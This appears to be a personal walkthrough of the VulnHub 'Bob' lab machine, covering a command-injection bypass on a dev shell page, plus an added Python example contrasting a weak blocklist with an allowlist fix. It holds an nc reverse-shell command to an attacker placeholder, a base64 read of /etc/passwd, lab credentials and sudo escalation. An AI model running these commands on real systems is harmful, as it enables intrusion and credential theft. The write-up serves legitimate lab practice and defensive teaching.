Bob machine — Walkthrough
Hi guys, this is the fifth day and fifth box (5D-5B for my personal reference). I will be trying to complete at least one box per day (two or more if I can) so I can gain confidence, learn new things, and prepare for OSCP.
Wish me luck!
So, today I would like to work on Bob machine, which is from VulnHub. Let’s get started!
Enumeration
Nmap
It looks like there are only 2 open ports. Also, we can see there are a few disallowed entries.
/lat_memo.html
Hmmm, good job IT Bob.
/passwords.html
Good one, Bob. Don’t be mad, Bob.
/login.php
/dev_shell.php
Looks like we have a playground here. Let’s try some commands.
It seems to work a little bit. But not for everything…
Then, I looked at the source using Inspect. Soon Bob, soon.
Then I tried encoding it first, and it works!
base64 < ../../../etc/passwd | base64 -d
It took me some time (1 hour?) to find a command that would exploit it.
echo && nc <Attacker_IP> 1337 -e /bin/bash
And we will get our shell.
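Why the chained command gets through, shown as an added example that is not part of the original write-up or the machine's own code: the real dev_shell.php source is not reproduced here, so the first-word blocklist, the word lists and the function names below are assumptions, and 192.0.2.10 is a constructed documentation address. The second function is the defender's fix, an allowlist that never hands the input to a shell.

```python
import shlex

# Assumed model of the weak filter: only the first word is checked.
BLOCKED_WORDS = {"nc", "netcat", "cat", "ls", "pwd", "wget", "bash"}

def naive_blocklist_allows(cmd: str) -> bool:
    """Weak check: compare only the first word against a blocklist."""
    parts = cmd.split()
    return bool(parts) and parts[0] not in BLOCKED_WORDS

# Hardened alternative: exact allowlist, no shell interpretation at all.
ALLOWED_PROGRAMS = {"whoami", "id", "uptime", "date"}   # hypothetical list
SHELL_METACHARS = set("&|;<>$`\\\n(){}*?!~")

def allowlist_parse(cmd: str):
    """Return an argv list for subprocess.run(argv, shell=False), or None."""
    if any(ch in SHELL_METACHARS for ch in cmd):
        return None                  # chaining, redirection, substitution
    try:
        argv = shlex.split(cmd)
    except ValueError:               # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    if any(a.startswith("-") or "/" in a for a in argv[1:]):
        return None                  # no options or filesystem paths
    return argv

# Constructed sample inputs, built from the commands used in this write-up.
SAMPLES = [
    "whoami",
    "nc 192.0.2.10 1337 -e /bin/bash",
    "echo && nc 192.0.2.10 1337 -e /bin/bash",
    "base64 < ../../../etc/passwd | base64 -d",
]

def evaluate(samples):
    """Return (command, passes_blocklist, passes_allowlist) per sample."""
    return [(c, naive_blocklist_allows(c), allowlist_parse(c) is not None)
            for c in samples]

if __name__ == "__main__":
    for cmd, weak, strong in evaluate(SAMPLES):
        print(f"blocklist={weak!s:5} allowlist={strong!s:5} {cmd}")
```

The blocklist only ever sees `echo` or `base64` as the first word, so everything after `&&`, `<` or `|` reaches the shell unchecked; the allowlist rejects those inputs before anything is executed.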
Gobuster
Nothing really useful here.
80 — HTTP
Plain. Simple. Nothing.
Foothold then?
Now we will try to look for anything we can use on this machine. But first, we can upgrade the shell.
python -c 'import pty; pty.spawn("/bin/bash")'
.hint file
It is a hidden file named “hint”, so of course I am interested. Thanks Bob.
.old_passwordfile.html
Changing directory to bob, I saw this file that would possibly have a password we can use later on.
And we get the password.
Documents
Here we have secret, logins and a staff note. Let’s view them.
staff.txt
Looks like the staff do not get along with each other. Normal case.
Secret folder
I personally thought this was a “trap” to waste my time. But after changing directory a few times, I found a notes.sh! I was a bit excited when I saw it, as it looks like a name when the first letters are combined: HARPOCRATES
login.txt.gpg
It shows unreadable text when I try to view it. Maybe we can use some tools to read it?
The User Elliot
When looking into Elliot’s folder, I saw a file named “theadminisdumb.txt”.
Whoa, it has passwords again! Qwerty and theadminisdumb.
So, now we have the following:
Bob:theadminisdumb
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
jc:Qwerty
Elliot: ?
SSH to Seb
Now we try to ssh into one of the users, Sebastian, using the credentials we have.
Then, use the name found previously as the passphrase. By decrypting the file with it, we can get the password.
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
bobbob:b0bcat_
SSH to Bob
Now using the credentials, we can ssh to Bob.
Let’s check the permissions.
It looks like we can run sudo su straight away to become admin.
and the FLAGGGGGGGG~
Voila! Another room done!
Thank you for reading my write-up. I would like to improve my write-up skills in the future, and you can reach me through Twitter or comments. Any sponsors are also welcome.
Twitter: https://twitter.com/curse_jk
Buy me coffee: http://buymeacoffee.com/Cursemagic
Other medium write-ups: https://cursemagic.medium.com